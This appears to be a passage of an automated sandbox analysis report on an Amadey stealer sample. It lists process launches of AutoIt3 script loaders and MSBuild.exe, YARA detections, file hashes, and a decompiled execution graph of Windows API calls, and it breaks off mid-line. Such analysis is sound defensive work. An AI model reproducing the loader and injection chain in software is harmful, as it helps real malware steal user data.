                                                                                                Commandline:updater.exe C:\ProgramData\\huv9LF4.a3x
                                                                                                Imagebase:0x6d0000
                                                                                                File size:943'784 bytes
                                                                                                MD5 hash:3F58A517F1F4796225137E7659AD2ADB
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:Borland Delphi
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000023.00000002.2239705432.000000000428C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                Has exited:true

                                                                                                Target ID:36
                                                                                                Start time:12:10:58
                                                                                                Start date:27/10/2024
                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                Imagebase:0x180000
                                                                                                File size:262'432 bytes
                                                                                                MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:37
                                                                                                Start time:12:10:58
                                                                                                Start date:27/10/2024
                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                Imagebase:0xdd0000
                                                                                                File size:262'432 bytes
                                                                                                MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:false

                                                                                                Target ID:38
                                                                                                Start time:12:11:10
                                                                                                Start date:27/10/2024
                                                                                                Path:C:\edgheaa\AutoIt3.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\edgheaa\AutoIt3.exe" C:\edgheaa\fkccfcd.a3x
                                                                                                Imagebase:0xc70000
                                                                                                File size:943'784 bytes
                                                                                                MD5 hash:3F58A517F1F4796225137E7659AD2ADB
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:Borland Delphi
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000026.00000002.2411065560.00000000044DC000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                Antivirus matches:
                                                                                                • Detection: 0%, ReversingLabs
                                                                                                Has exited:true

                                                                                                Target ID:39
                                                                                                Start time:12:11:15
                                                                                                Start date:27/10/2024
                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                Imagebase:0x400000
                                                                                                File size:262'432 bytes
                                                                                                MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:40
                                                                                                Start time:12:11:15
                                                                                                Start date:27/10/2024
                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                Imagebase:0x260000
                                                                                                File size:262'432 bytes
                                                                                                MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:41
                                                                                                Start time:12:11:15
                                                                                                Start date:27/10/2024
                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                Imagebase:0x6b0000
                                                                                                File size:262'432 bytes
                                                                                                MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000029.00000002.2409431093.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                Has exited:true

                                                                                                Target ID:42
                                                                                                Start time:12:11:19
                                                                                                Start date:27/10/2024
                                                                                                Path:C:\edgheaa\AutoIt3.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\edgheaa\AutoIt3.exe" C:\edgheaa\fkccfcd.a3x
                                                                                                Imagebase:0xc70000
                                                                                                File size:943'784 bytes
                                                                                                MD5 hash:3F58A517F1F4796225137E7659AD2ADB
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:Borland Delphi
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000002A.00000002.2499336033.000000000437C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                Has exited:true

                                                                                                Target ID:44
                                                                                                Start time:12:11:24
                                                                                                Start date:27/10/2024
                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                Imagebase:0x3e0000
                                                                                                File size:262'432 bytes
                                                                                                MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:45
                                                                                                Start time:12:11:24
                                                                                                Start date:27/10/2024
                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                Imagebase:0x6c0000
                                                                                                File size:262'432 bytes
                                                                                                MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Reset < >

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:3.5%
                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                  Signature Coverage:8.5%
                                                                                                  Total number of Nodes:2000
                                                                                                  Total number of Limit Nodes:61
                                                                                                  execution_graph 115642 6da18d 115643 718fa3 115642->115643 115644 6da1b3 115642->115644 115647 719063 115643->115647 115649 719007 115643->115649 115655 719027 115643->115655 115645 6da2fd 115644->115645 115648 6f042b 21 API calls 115644->115648 115650 6f045b 21 API calls 115645->115650 115700 744358 79 API calls __wsopen_s 115647->115700 115654 6da1dd 115648->115654 115698 6d914c 91 API calls 115649->115698 115659 6da334 __fread_nolock 115650->115659 115651 71905e 115656 6f042b 21 API calls 115654->115656 115654->115659 115655->115651 115699 744358 79 API calls __wsopen_s 115655->115699 115657 6da22b 115656->115657 115657->115649 115660 6da266 115657->115660 115658 6f045b 21 API calls 115658->115659 115659->115655 115659->115658 115660->115651 115660->115659 115661 719086 115660->115661 115663 6da2c7 115660->115663 115664 6d9976 115660->115664 115701 744358 79 API calls __wsopen_s 115661->115701 115663->115645 115663->115664 115665 6f042b 21 API calls 115664->115665 115666 6d99d9 115665->115666 115682 6d1e4e 115666->115682 115669 6f042b 21 API calls 115675 6d9abe messages 115669->115675 115671 6dfbc8 21 API calls 115671->115675 115674 71955a 115703 73010c 21 API calls messages 115674->115703 115675->115671 115675->115674 115676 719575 115675->115676 115678 6d1dd1 21 API calls 115675->115678 115679 6d9d61 messages 115675->115679 115702 6d3574 21 API calls 115675->115702 115678->115675 115680 6d9dfc messages 115679->115680 115689 6d1dd1 115679->115689 115681 6d9e13 115680->115681 115697 6d24c6 21 API calls messages 115680->115697 115686 6d1e5e 115682->115686 115683 6d1e66 115683->115669 115684 6f042b 21 API calls 115684->115686 115685 6df38f 21 API calls 115685->115686 115686->115683 115686->115684 115686->115685 115687 6dfbc8 21 API calls 115686->115687 115688 6d1e4e 21 API calls 115686->115688 115687->115686 115688->115686 115690 6d1e07 messages 115689->115690 115691 6d1ddf 115689->115691 115690->115680 115692 6d1ded 115691->115692 115693 6d1dd1 21 API calls 115691->115693 115694 6d1df3 115692->115694 115695 6d1dd1 21 API calls 115692->115695 115693->115692 115694->115690 115704 6d3490 21 API calls messages 115694->115704 115695->115694 115697->115680 115698->115655 115699->115651 115700->115651 115701->115651 115702->115675 115703->115676 115704->115690 114114 7196f0 114115 7196fb 114114->114115 114152 6da791 messages 114114->114152 114115->114115 114116 6daa25 timeGetTime 114116->114152 114118 6dab8d Sleep 114120 6dab9e 114118->114120 114131 6daba9 114118->114131 114258 6efb90 timeGetTime 114120->114258 114121 71a622 Sleep 114124 71a633 114121->114124 114125 71a63e 114121->114125 114122 71986e timeGetTime 114259 6d362b 22 API calls 114122->114259 114278 6efb90 timeGetTime 114124->114278 114126 71a689 114125->114126 114170 6da9d3 messages 114125->114170 114279 73e2ab 45 API calls 114125->114279 114136 71a6b9 GetExitCodeProcess 114126->114136 114144 71a6ff 114126->114144 114126->114170 114129 719a6e Sleep 114129->114170 114134 71a501 114131->114134 114135 71a50a 114131->114135 114145 6dac34 114131->114145 114147 71a508 114131->114147 114131->114170 114274 7632dd GetForegroundWindow 114134->114274 114275 7632dd GetForegroundWindow 114135->114275 114141 71a6e5 CloseHandle 114136->114141 114142 71a6cf WaitForSingleObject 114136->114142 114141->114144 114142->114141 114142->114170 114143 71a740 Sleep 114143->114170 114144->114143 114145->114170 114147->114145 114148 71a5f5 114147->114148 114147->114170 114276 7304cb 21 API calls 114147->114276 114277 73f7f5 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 114148->114277 114152->114116 114152->114118 114152->114121 114152->114122 114152->114129 114153 71991a 114152->114153 114159 6daad7 114152->114159 114162 71971d TranslateAcceleratorW 114152->114162 114168 6dab6f TranslateMessage DispatchMessageW 114152->114168 114152->114170 114176 6d7d70 114152->114176 114183 6d7ff0 114152->114183 114204 6d8e00 114152->114204 114233 6e59e7 114152->114233 114238 6f045b 114152->114238 114248 6f042b 114152->114248 114260 744636 21 API calls 114152->114260 114261 7634d5 21 API calls 114152->114261 114262 6d362b 22 API calls 114152->114262 114263 6dfa3b 114153->114263 114273 744358 79 API calls __wsopen_s 114159->114273 114161 71996b 114164 6dfa3b 21 API calls 114161->114164 114162->114152 114163 719736 114162->114163 114166 7199ad 114164->114166 114270 6d21b0 39 API calls 114166->114270 114168->114152 114169 7199c9 114171 6dfa3b 21 API calls 114169->114171 114172 719a0b 114171->114172 114271 6d21b0 39 API calls 114172->114271 114174 719a27 114272 744636 21 API calls 114174->114272 114177 6d7d8f 114176->114177 114178 6d7da3 114176->114178 114280 6d7870 91 API calls 2 library calls 114177->114280 114281 744358 79 API calls __wsopen_s 114178->114281 114180 6d7d9a 114180->114152 114182 717c61 114182->114182 114184 6d8030 114183->114184 114195 6d80fc messages 114184->114195 114291 6f0854 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 114184->114291 114187 717cb6 114187->114195 114292 6df38f 114187->114292 114188 6df38f 21 API calls 114188->114195 114195->114188 114200 6d2510 21 API calls 114195->114200 114201 744358 79 API calls 114195->114201 114202 6d8401 114195->114202 114282 6dfbc8 114195->114282 114286 6d1d83 114195->114286 114290 6d6394 90 API calls 114195->114290 114299 6f0854 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 114195->114299 114300 6f06d4 28 API calls __onexit 114195->114300 114301 6f080a EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 114195->114301 114302 757497 91 API calls 114195->114302 114196 717cda 114298 6f080a EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 114196->114298 114200->114195 114201->114195 114202->114152 114205 6d908a 114204->114205 114206 6d8e62 114204->114206 114353 6f0854 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 114205->114353 114208 6d8e6e 114206->114208 114209 718b44 114206->114209 114304 6e5eb0 114208->114304 114355 757c74 163 API calls 114209->114355 114211 6d9094 114211->114206 114215 6dfa3b 21 API calls 114211->114215 114213 718b54 114228 6d903a 114213->114228 114356 744358 79 API calls __wsopen_s 114213->114356 114220 6d90b2 114215->114220 114217 6d8e9f 114218 6e5eb0 9 API calls 114217->114218 114217->114228 114219 6d8eb3 114218->114219 114219->114213 114221 6e5eb0 9 API calls 114219->114221 114354 6f080a EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 114220->114354 114224 6d8ecc 114221->114224 114224->114213 114225 6d8f5d 114224->114225 114226 6e5eb0 9 API calls 114225->114226 114227 6d8f70 114226->114227 114327 6dc263 114227->114327 114345 74fc5b 114227->114345 114228->114152 114229 6d8f8c messages 114229->114228 114352 6d29d0 21 API calls messages 114229->114352 114234 6e5a2b 114233->114234 114236 6e59f9 114233->114236 114234->114152 114235 6e5a1e IsDialogMessageW 114235->114234 114235->114236 114236->114234 114236->114235 114237 729c70 GetClassLongW 114236->114237 114237->114235 114237->114236 114240 6f042b 114238->114240 114241 6f044a 114240->114241 114243 6f044c 114240->114243 114546 6fe8ac 114240->114546 114553 6f4dd8 7 API calls 2 library calls 114240->114553 114241->114152 114244 6f0c79 114243->114244 114554 6f440c RaiseException 114243->114554 114555 6f440c RaiseException 114244->114555 114246 6f0c96 114246->114152 114249 6f0430 114248->114249 114250 6fe8ac ___std_exception_copy 20 API calls 114249->114250 114251 6f044a 114249->114251 114254 6f044c 114249->114254 114558 6f4dd8 7 API calls 2 library calls 114249->114558 114250->114249 114251->114152 114253 6f0c79 114560 6f440c RaiseException 114253->114560 114254->114253 114559 6f440c RaiseException 114254->114559 114256 6f0c96 114256->114152 114258->114131 114259->114152 114260->114152 114261->114152 114262->114152 114264 6dfa4a _wcslen 114263->114264 114265 6f045b 21 API calls 114264->114265 114266 6dfa72 __fread_nolock 114265->114266 114267 6f042b 21 API calls 114266->114267 114268 6dfa88 114267->114268 114269 6d21b0 39 API calls 114268->114269 114269->114161 114270->114169 114271->114174 114272->114170 114273->114170 114274->114147 114275->114147 114276->114148 114277->114145 114278->114125 114279->114126 114280->114180 114281->114182 114283 6dfbeb __fread_nolock 114282->114283 114284 6dfbdc 114282->114284 114283->114195 114284->114283 114285 6f045b 21 API calls 114284->114285 114285->114283 114287 6d1d8e 114286->114287 114289 6d1dbd 114287->114289 114303 6d21b0 39 API calls 114287->114303 114289->114195 114290->114195 114291->114187 114293 6f045b 21 API calls 114292->114293 114294 6df3a4 114293->114294 114295 6f042b 21 API calls 114294->114295 114296 6df3b2 114295->114296 114297 6f06d4 28 API calls __onexit 114296->114297 114297->114196 114298->114195 114299->114195 114300->114195 114301->114195 114302->114195 114303->114289 114305 6e5edd 114304->114305 114306 6d8e7a 114304->114306 114357 6f0854 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 114305->114357 114310 6d8c60 114306->114310 114308 6e5ee7 114308->114306 114358 6f080a EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 114308->114358 114311 718a9a 114310->114311 114314 6d8c8c 114310->114314 114312 718aab 114311->114312 114360 744358 79 API calls __wsopen_s 114311->114360 114312->114217 114315 718abf 114314->114315 114322 6d8cca __fread_nolock 114314->114322 114361 744358 79 API calls __wsopen_s 114315->114361 114318 6f042b 21 API calls 114318->114322 114319 6f045b 21 API calls 114319->114322 114320 718b03 114362 6d914c 91 API calls 114320->114362 114322->114318 114322->114319 114322->114320 114323 718b19 114322->114323 114324 6d8dac 114322->114324 114325 6d8d99 114322->114325 114323->114324 114363 744358 79 API calls __wsopen_s 114323->114363 114324->114217 114325->114324 114359 75630a 53 API calls _wcslen 114325->114359 114328 6dc296 114327->114328 114344 6dc333 114327->114344 114329 6dc2a6 114328->114329 114415 6d334c 114328->114415 114331 6dc2b9 114329->114331 114332 6d334c 38 API calls 114329->114332 114333 6d334c 38 API calls 114331->114333 114335 6dc2cc 114331->114335 114332->114331 114333->114335 114334 6dc2df 114337 6dc2f2 114334->114337 114338 6d334c 38 API calls 114334->114338 114335->114334 114336 6d334c 38 API calls 114335->114336 114336->114334 114339 6dc305 114337->114339 114341 6d334c 38 API calls 114337->114341 114338->114337 114364 6d304c 114339->114364 114341->114339 114344->114229 114346 6d304c 52 API calls 114345->114346 114347 74fc95 114346->114347 114461 6dfe70 114347->114461 114349 74fca5 114351 74fcce 114349->114351 114489 6d32c3 114349->114489 114351->114229 114352->114229 114353->114211 114354->114206 114355->114213 114356->114228 114357->114308 114358->114306 114359->114324 114360->114312 114361->114324 114362->114323 114363->114324 114365 6d3063 114364->114365 114382 6d305e 114364->114382 114366 6d3099 114365->114366 114367 6d306b 114365->114367 114368 712e83 114366->114368 114371 6d30ab 114366->114371 114379 712d8c 114366->114379 114419 6f50f1 25 API calls 114367->114419 114422 6f50ae 25 API calls 114368->114422 114420 6f016e 50 API calls 114371->114420 114372 6d307b 114375 6f042b 21 API calls 114372->114375 114373 712e9b 114373->114373 114377 6d3085 114375->114377 114380 6dfa3b 21 API calls 114377->114380 114378 712e05 114421 6f016e 50 API calls 114378->114421 114379->114378 114381 6f045b 21 API calls 114379->114381 114380->114382 114383 712dd5 114381->114383 114387 6e51fb 114382->114387 114384 6f042b 21 API calls 114383->114384 114385 712dfc 114384->114385 114386 6dfa3b 21 API calls 114385->114386 114386->114378 114388 6f042b 21 API calls 114387->114388 114389 6e520e 114388->114389 114423 6e5d68 114389->114423 114393 6e5240 114395 6e52c8 SystemParametersInfoW GetSystemMetrics 114393->114395 114396 6e52f5 114393->114396 114413 6e5435 114393->114413 114395->114396 114397 6e52fb SystemParametersInfoW GetSystemMetrics 114396->114397 114398 6e5341 SetRect AdjustWindowRectEx CreateWindowExW 114396->114398 114397->114398 114402 6e5330 GetSystemMetrics 114397->114402 114403 6e53a2 SetWindowLongW GetClientRect GetStockObject SendMessageW 114398->114403 114398->114413 114399 728df5 GetWindowRect GetClientRect GetSystemMetrics GetSystemMetrics 114400 728e47 GetSystemMetrics 114399->114400 114399->114413 114400->114413 114401 728dbb 114405 728e7e 114401->114405 114451 768251 GetWindowLongW DestroyWindow 114401->114451 114402->114398 114430 6e4b74 GetCursorPos ScreenToClient 114403->114430 114455 6e544c 39 API calls 114405->114455 114409 6e541d 114450 6e5915 GetWindowLongW 114409->114450 114410 6e5407 SetTimer 114410->114409 114411 728e87 114411->114411 114413->114399 114413->114401 114414 6e5441 114413->114414 114452 6e4e5a 114413->114452 114414->114344 114416 6d3364 114415->114416 114417 6d335d 114415->114417 114416->114329 114417->114416 114460 6f61fc 38 API calls 114417->114460 114419->114372 114420->114372 114421->114368 114422->114373 114424 6df38f 21 API calls 114423->114424 114425 6e5d95 114424->114425 114426 6df38f 21 API calls 114425->114426 114427 6e5dc3 114426->114427 114428 6df38f 21 API calls 114427->114428 114429 6e5216 114427->114429 114428->114427 114429->114393 114444 6e2960 114429->114444 114431 6e4bbd 114430->114431 114432 6e4bc5 GetAsyncKeyState GetAsyncKeyState 114431->114432 114456 76360f 21 API calls 114431->114456 114433 728c05 114432->114433 114440 6e4c11 114432->114440 114437 728c2c 114433->114437 114433->114440 114457 76360f 21 API calls 114433->114457 114435 728c00 114435->114432 114436 6e4c29 114436->114409 114436->114410 114458 76360f 21 API calls 114437->114458 114440->114436 114459 76360f 21 API calls 114440->114459 114441 728c37 114441->114440 114443 728c40 GetWindowLongW 114441->114443 114443->114437 114445 6e2972 114444->114445 114449 6e2991 __fread_nolock 114444->114449 114447 6f045b 21 API calls 114445->114447 114446 6f042b 21 API calls 114448 6e29a8 114446->114448 114447->114449 114448->114393 114449->114446 114450->114413 114451->114413 114453 6e4e68 GetWindowLongW 114452->114453 114454 6e4e76 114452->114454 114453->114454 114454->114413 114455->114411 114456->114435 114457->114441 114458->114440 114459->114436 114460->114416 114503 6df6d1 114461->114503 114463 6e00bb 114516 6e1323 21 API calls __fread_nolock 114463->114516 114467 6e00d5 114467->114349 114468 6df9fa 21 API calls 114487 6dfe95 __fread_nolock 114468->114487 114469 72664c 114520 73a4b0 81 API calls __wsopen_s 114469->114520 114470 726467 114477 6f042b 21 API calls 114470->114477 114471 6e1323 21 API calls 114471->114487 114472 6e04cd 114472->114467 114522 73a4b0 81 API calls __wsopen_s 114472->114522 114476 72665a 114521 6e1323 21 API calls __fread_nolock 114476->114521 114479 72653d 114477->114479 114481 6f045b 21 API calls 114479->114481 114480 726670 114480->114467 114488 72657a __fread_nolock 114481->114488 114484 6e0089 CharUpperBuffW 114515 6e146a 21 API calls 114484->114515 114485 6f045b 21 API calls 114485->114487 114487->114463 114487->114468 114487->114469 114487->114470 114487->114471 114487->114472 114487->114485 114487->114488 114508 6e20c0 40 API calls _wcslen 114487->114508 114509 6dfaa1 114487->114509 114517 6dfcc7 22 API calls __fread_nolock 114487->114517 114518 6df5c0 21 API calls __fread_nolock 114487->114518 114519 6e146a 21 API calls 114487->114519 114488->114469 114488->114472 114490 71304d 114489->114490 114493 6d32d3 114489->114493 114494 71305e 114490->114494 114523 6df82c 114490->114523 114496 6f042b 21 API calls 114493->114496 114535 6df9fa 114494->114535 114495 713068 114495->114495 114497 6d32e6 114496->114497 114498 6d32ef 114497->114498 114499 6d3301 114497->114499 114500 6dfa3b 21 API calls 114498->114500 114501 6df38f 21 API calls 114499->114501 114502 6d32f7 114500->114502 114501->114502 114502->114351 114504 6f045b 21 API calls 114503->114504 114505 6df6f6 114504->114505 114506 6f042b 21 API calls 114505->114506 114507 6df704 114506->114507 114507->114487 114508->114487 114510 6dfab4 114509->114510 114514 6dfab1 __fread_nolock 114509->114514 114511 6f042b 21 API calls 114510->114511 114512 6dfabf 114511->114512 114513 6f045b 21 API calls 114512->114513 114513->114514 114514->114484 114515->114487 114516->114467 114517->114487 114518->114487 114519->114487 114520->114476 114521->114480 114522->114467 114524 6df83c _wcslen 114523->114524 114525 726258 114523->114525 114528 6df877 114524->114528 114529 6df852 114524->114529 114542 6df9a0 114525->114542 114527 726261 114527->114527 114531 6f042b 21 API calls 114528->114531 114541 6dfb74 21 API calls 114529->114541 114532 6df883 114531->114532 114533 6f045b 21 API calls 114532->114533 114534 6df85a __fread_nolock 114533->114534 114534->114494 114536 6dfa14 114535->114536 114537 6dfa07 114535->114537 114538 6f042b 21 API calls 114536->114538 114537->114495 114539 6dfa1e 114538->114539 114540 6f045b 21 API calls 114539->114540 114540->114537 114541->114534 114543 6df9ae 114542->114543 114545 6df9b7 __fread_nolock 114542->114545 114544 6dfaa1 21 API calls 114543->114544 114543->114545 114544->114545 114545->114527 114552 70282e _abort 114546->114552 114547 70286c 114557 7026cc 19 API calls _abort 114547->114557 114549 702857 RtlAllocateHeap 114550 70286a 114549->114550 114549->114552 114550->114240 114552->114547 114552->114549 114556 6f4dd8 7 API calls 2 library calls 114552->114556 114553->114240 114554->114244 114555->114246 114556->114552 114557->114550 114558->114249 114559->114253 114560->114256 115705 149ab28 115706 149aeef 115705->115706 115708 149c572 115706->115708 115711 14c4569 115708->115711 115720 14c477f 115711->115720 115713 14c4578 115714 149c57e 115713->115714 115723 14b9b33 115713->115723 115803 14a01f1 115713->115803 115807 14b9baf 115713->115807 115887 14b961d GetCurrentProcess TerminateProcess 115713->115887 115888 14b9bd9 115713->115888 115968 14c4916 GetPEB 115720->115968 115722 14c478b 115722->115713 115724 14b9b80 115723->115724 115970 14a2571 GetModuleHandleA 115724->115970 115804 14a0224 115803->115804 116699 14a0181 115804->116699 115808 14b9bd1 115807->115808 115808->115808 115809 14a2571 43 API calls 115808->115809 115810 14b9bf2 115809->115810 115811 14b621d 14 API calls 115810->115811 115812 14b9c05 115811->115812 115813 14a04e1 11 API calls 115812->115813 115814 14b9c14 115813->115814 115815 149f2a5 22 API calls 115814->115815 115816 14b9c23 115815->115816 115817 14b9c2c MessageBoxA 115816->115817 115818 14b9c44 115816->115818 115819 14b9e0a 115817->115819 115820 14b66c5 15 API calls 115818->115820 115821 14a04b1 11 API calls 115819->115821 115822 14b9c51 115820->115822 115823 14b9e24 115821->115823 115824 14a04e1 11 API calls 115822->115824 116742 14a16b5 11 API calls 115823->116742 115826 14b9c5e 115824->115826 115828 14b9c9b 115826->115828 116737 14a4121 11 API calls 115826->116737 115827 14b9e32 115831 14a048d 11 API calls 115827->115831 115829 14b9cbc 115828->115829 115830 14b9ca4 MessageBoxA 115828->115830 115835 14b651d 11 API calls 115829->115835 115830->115819 115833 14b9e3a 115831->115833 116743 14a16b5 11 API calls 115833->116743 115834 14b9c74 115837 14a04e1 11 API calls 115834->115837 115838 14b9cd1 115835->115838 115840 14b9c81 115837->115840 115841 14a04e1 11 API calls 115838->115841 115839 14b9e48 115842 14a04b1 11 API calls 115839->115842 115843 14b66c5 15 API calls 115840->115843 115844 14b9ce1 115841->115844 115845 14b9e55 115842->115845 115846 14b9c8e 115843->115846 115847 14b672d 11 API calls 115844->115847 115845->115714 115848 14a04e1 11 API calls 115846->115848 115849 14b9cf6 115847->115849 115848->115828 115850 14a04e1 11 API calls 115849->115850 115851 14b9d03 115850->115851 115852 14b651d 11 API calls 115851->115852 115853 14b9d18 115852->115853 115854 14a04e1 11 API calls 115853->115854 115855 14b9d28 115854->115855 115856 14b672d 11 API calls 115855->115856 115857 14b9d3d 115856->115857 115858 14a04e1 11 API calls 115857->115858 115859 14b9d4a GetTickCount 115858->115859 115860 14b9d5b 115859->115860 115861 14b9865 52 API calls 115860->115861 115862 14b9d81 115861->115862 115863 14b871d 76 API calls 115862->115863 115864 14b9d8d 115863->115864 115865 14b7e09 86 API calls 115864->115865 115866 14b9d97 115865->115866 115887->115714 115889 14b9be1 115888->115889 115889->115889 115890 14a2571 43 API calls 115889->115890 115891 14b9bf2 115890->115891 115892 14b621d 14 API calls 115891->115892 115893 14b9c05 115892->115893 115894 14a04e1 11 API calls 115893->115894 115895 14b9c14 115894->115895 115896 149f2a5 22 API calls 115895->115896 115897 14b9c23 115896->115897 115898 14b9c2c MessageBoxA 115897->115898 115899 14b9c44 115897->115899 115900 14b9e0a 115898->115900 115901 14b66c5 15 API calls 115899->115901 115902 14a04b1 11 API calls 115900->115902 115903 14b9c51 115901->115903 115904 14b9e24 115902->115904 115905 14a04e1 11 API calls 115903->115905 116749 14a16b5 11 API calls 115904->116749 115907 14b9c5e 115905->115907 115909 14b9c9b 115907->115909 116744 14a4121 11 API calls 115907->116744 115908 14b9e32 115912 14a048d 11 API calls 115908->115912 115910 14b9cbc 115909->115910 115911 14b9ca4 MessageBoxA 115909->115911 115916 14b651d 11 API calls 115910->115916 115911->115900 115914 14b9e3a 115912->115914 116750 14a16b5 11 API calls 115914->116750 115915 14b9c74 115918 14a04e1 11 API calls 115915->115918 115919 14b9cd1 115916->115919 115921 14b9c81 115918->115921 115922 14a04e1 11 API calls 115919->115922 115920 14b9e48 115923 14a04b1 11 API calls 115920->115923 115924 14b66c5 15 API calls 115921->115924 115925 14b9ce1 115922->115925 115926 14b9e55 115923->115926 115927 14b9c8e 115924->115927 115928 14b672d 11 API calls 115925->115928 115926->115714 115929 14a04e1 11 API calls 115927->115929 115930 14b9cf6 115928->115930 115929->115909 115931 14a04e1 11 API calls 115930->115931 115932 14b9d03 115931->115932 115933 14b651d 11 API calls 115932->115933 115934 14b9d18 115933->115934 115935 14a04e1 11 API calls 115934->115935 115936 14b9d28 115935->115936 115937 14b672d 11 API calls 115936->115937 115938 14b9d3d 115937->115938 115939 14a04e1 11 API calls 115938->115939 115940 14b9d4a GetTickCount 115939->115940 115941 14b9d5b 115940->115941 115942 14b9865 52 API calls 115941->115942 115943 14b9d81 115942->115943 115944 14b871d 76 API calls 115943->115944 115945 14b9d8d 115944->115945 115946 14b7e09 86 API calls 115945->115946 115947 14b9d97 115946->115947 115969 14c4929 115968->115969 115969->115722 115971 14a25a4 115970->115971 115972 14a01f1 42 API calls 115971->115972 115973 14a25b0 115972->115973 115974 14b621d 115973->115974 116249 14b6181 115974->116249 115976 14b6242 116258 14b6085 115976->116258 115980 14b6257 116275 14b3d81 115980->116275 116301 14b5fe5 116249->116301 116251 14b6199 116252 14b61a9 116251->116252 116253 14b619e 116251->116253 116255 14a04e1 11 API calls 116252->116255 116309 14b60ed 11 API calls 116253->116309 116257 14b61b5 116255->116257 116256 14b61a7 116256->115976 116257->115976 116259 14b5fe5 14 API calls 116258->116259 116260 14b609d 116259->116260 116261 14a0731 116260->116261 116262 14a0774 116261->116262 116263 14a0735 116261->116263 116262->115980 116264 14a073f 116263->116264 116265 14a04e1 116263->116265 116266 14a0769 116264->116266 116267 14a0752 116264->116267 116269 14a04f5 116265->116269 116310 14a0551 116265->116310 116270 14a0a59 11 API calls 116266->116270 116319 14a0a59 116267->116319 116271 14a0523 116269->116271 116315 149ef3d 116269->116315 116274 14a0757 116270->116274 116271->115980 116274->115980 116276 14b3d95 116275->116276 116331 14b3c05 116276->116331 116279 14b49a5 116280 14b49c6 116279->116280 116348 14b4931 116280->116348 116302 14a048d 11 API calls 116301->116302 116303 14b6002 116302->116303 116304 14b6029 RegOpenKeyExA 116303->116304 116305 